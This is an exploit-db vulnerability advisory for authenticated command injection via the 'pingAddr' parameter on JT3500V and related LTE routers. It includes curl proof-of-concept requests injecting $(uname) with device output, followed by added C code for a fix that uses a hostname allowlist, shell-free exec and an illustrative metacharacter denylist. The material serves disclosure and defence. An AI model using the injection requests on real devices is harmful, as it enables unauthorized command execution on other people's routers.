KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 – Command Injection (Authenticated)

  • Author: LiquidWorm
    Date: 2021-03-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49680/
  • # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
    # Date: 03.02.2021
    # Exploit Author: LiquidWorm
    # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
    
    Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
    Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
    http://www.jatontec.com/products/show.php?itemid=258
    http://www.jatontech.com/CAT12.html#_pp=105_564
    http://www.kzbtech.com/AM3300V.html
    
    Affected version:
    
      Model    | Firmware
     ----------|------------
      JT3500V  | 2.0.1B1064
      JT3300V  | 2.0.1B1047
      AM6200M  | 2.0.0B3210
      AM6000N  | 2.0.0B3042
      AM5000W  | 2.0.0B3037
      AM4200M  | 2.0.0B2996
      AM4100V  | 2.0.0B2988
      AM3500MW | 2.0.0B1092
      AM3410V  | 2.0.0B1085
      AM3300V  | 2.0.0B1060
      AM3100E  | 2.0.0B981
      AM3100V  | 2.0.0B946
      AM3000M  | 2.0.0B21
      KZ7621U  | 2.0.0B14
      KZ3220M  | 2.0.0B04
      KZ3120R  | 2.0.0B01
    
    Summary: JT3500V is an advanced LTE-A Pro CAT12 indoor Wi-Fi
    & VoIP CPE product designed to enable quick and easy LTE fixed
    data service deployment for residential and SOHO customers.
    It provides integrated high-speed LAN, Wi-Fi and VoIP services
    to end users who need both bandwidth and multimedia data service
    in residential homes or enterprises. The device has 2 Gigabit LAN
    ports, 1 RJ11 analog phone port, high-performance 4x4 MIMO and
    CA capabilities, 802.11b/g/n/ac dual-band Wi-Fi, and advanced
    routing and firewall software for security. It provides an
    effective all-in-one solution for SOHO or residential customers
    and can deliver up to 1Gbps maximum data throughput, which makes
    it competitive with wired broadband access service.
    
    Desc: The application suffers from an authenticated OS command
    injection vulnerability. This can be exploited to inject and
    execute arbitrary shell commands through the 'pingAddr' HTTP
    POST parameter, bypassing the device's injection protection filter.
    
    Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
     Linux 2.6.36+ (mips)
     Mediatek APSoC SDK v4.3.1.0
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2021-5635
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
    
    
    03.02.2021
    
    --
    
    
    #JT3300V/AM3300V
    lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
    --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
    -H "Cookie: kz_userid=admin:311139" \
    -H "X-Requested-With: XMLHttpRequest"
    ping: bad address 'Linux'
    lqwrm@metalgear:~/prive$ 
    
    
    #JT3500V
    lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
    --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
    -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
    -H "X-Requested-With: XMLHttpRequest"
    ping: bad address 'Linux'
    lqwrm@metalgear:~/prive$
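The handler-side fix this advisory implies, written out as an added example (this is not code from the advisory, from exploit-db, or from the vendor's GoAhead firmware): the `pingAddr` value is checked against an allowlist of the characters that can legally appear in an IPv4 literal or a DNS hostname, and `ping` is started with an argv array instead of through a shell, so the target can never be parsed as shell syntax. The `naive_denylist_filter` beside it is a constructed stand-in for the kind of metacharacter filter the advisory says the `$(uname)` payload slips past; the device's real filter code is not on the page. All function names and the `ping` arguments are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Longest DNS name the allowlist accepts (RFC 1035 limit). */
#define MAX_TARGET_LEN 253

/* Constructed stand-in for a metacharacter denylist (NOT the device's real
 * filter). It reports "clean" when none of the listed characters is
 * present, so an input built from '$', '(' and ')' passes untouched. */
static bool naive_denylist_filter(const char *s)
{
    return strpbrk(s, ";|&`<>\n") == NULL;
}

/* Allowlist: accept only what an IPv4 literal or hostname can contain.
 * Characters: letters, digits, '.', '-'. Labels are 1..63 characters,
 * may not start or end with '-', and the whole name is at most 253
 * characters. Anything else (shell syntax, spaces, a leading '-' that
 * could be taken as a ping option) is rejected. */
static bool is_valid_ping_target(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > MAX_TARGET_LEN)
        return false;

    size_t label_len = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            /* empty label ("a..b", leading '.') or label ending in '-' */
            if (label_len == 0 || s[i - 1] == '-')
                return false;
            label_len = 0;
            continue;
        }
        if (!(isalnum(c) || c == '-'))
            return false;
        if (c == '-' && label_len == 0)
            return false;
        if (++label_len > 63)
            return false;
    }
    /* final label must be non-empty and must not end with '-' */
    return label_len > 0 && s[len - 1] != '-';
}

/* Run ping as a child process with an explicit argv: no /bin/sh, so there
 * is nothing to inject into. Returns ping's exit status, or -1 when the
 * target fails validation, the count is out of range, or the child
 * cannot be started. Assumes a 'ping' binary on PATH that takes -c. */
static int run_ping(const char *target, int count)
{
    if (!is_valid_ping_target(target) || count < 1 || count > 10)
        return -1;

    char count_str[16];
    snprintf(count_str, sizeof count_str, "%d", count);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execlp("ping", "ping", "-c", count_str, target, (char *)NULL);
        _exit(127); /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    /* default input: the payload from the advisory's PoC request */
    const char *target = argc > 1 ? argv[1] : "$(uname)";

    printf("denylist : %s\n", naive_denylist_filter(target) ? "clean" : "blocked");
    printf("allowlist: %s\n", is_valid_ping_target(target) ? "valid" : "rejected");
    if (is_valid_ping_target(target))
        printf("ping exit status: %d\n", run_ping(target, 1));
    return 0;
}
```

Run with no argument to see the advisory's payload pass the denylist and fail the allowlist; run with `192.168.1.1` to see a legitimate target accepted and pinged once. The two changes reinforce each other: the allowlist stops the request at the parameter boundary, and the argv-based exec means that even a validation bug would hand `ping` a string, not the shell a command line.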
    